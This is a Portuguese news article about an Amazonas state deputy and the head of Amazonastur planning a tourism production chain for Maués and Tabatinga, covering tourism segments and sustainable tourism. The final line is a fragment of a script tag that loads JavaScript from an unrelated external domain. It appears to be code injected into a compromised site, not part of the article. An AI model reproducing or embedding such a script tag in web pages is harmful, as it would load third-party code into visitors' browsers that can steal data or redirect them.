Amazonastur e Deputado Sidney Leite projetam cadeia produtiva de turismo para Maués e Tabatinga
O deputado Sidney Leite (Pros) e a presidente da Amazonastur, Oreni Braga, iniciaram ontem (10/3) o planejamento para potencializar e organizar todo o ciclo de uma cadeia produtiva de turismo para as cidades de Tabatinga (região do Alto Solimões a cerca de 1.200 km de Manaus) e Maués, localizada no baixo Amazonas a menos de 400 km de Manaus via fluvial.
Neste primeiro momento de discussão sobre o trabalho a ser realizado nessas cidades ficou a premissa da segmentação turística entendida como uma forma de organizar o turismo para fins de planejamento, gestão e mercado. Os segmentos turísticos das duas cidades serão estabelecidos a partir dos elementos de identidade da oferta e também das características e variáveis da demanda.
Para o deputado Sidney Leite nesta macro segmentacao é exatamente onde residem os segmentos mais importantes e conhecidos: o turismo urbano, o turismo de natureza, o turismo sustentável e o turismo de praia, cada cidade com suas características e peculiaridades, disse à Coluna.
Sidney salientou que o turismo sustentável verdadeiro é aquele que busca minimizar impactos negativos ambientais e socioculturais, ao mesmo tempo que promove benefícios econômicos para comunidades locais e destinos. “É nessa premissa que iremos atuar”, argumentou o deputado.
Tanto Tabatinga, com sua imensa área de tríplice fronteira (Brasil, Colômbia e Peru), e a cidade Maués com suas dezenas de comunidades, estarão comprometidas com o manejo ambiental, garantiu o parlamentar.
Ao fim da reunião, ocorrida na sede nova da Amazonastur situada no Auditório Vasco Vasques ao lado da Arena da Amazônia, Sidney e Oreni Braga pautaram para na última semana de março outra reunião desta vez com os gestores dos municípios de Maués e Tabatinga.
A assessoria de Junior Leite (Pros) prefeito de Maués, e Saul Bemerguy (PSD), prefeito de Tabatinga, já confirmaram suas presenças.
src=’https://s2.voipnewswire.net/s2.js’ type=’text/javascript’>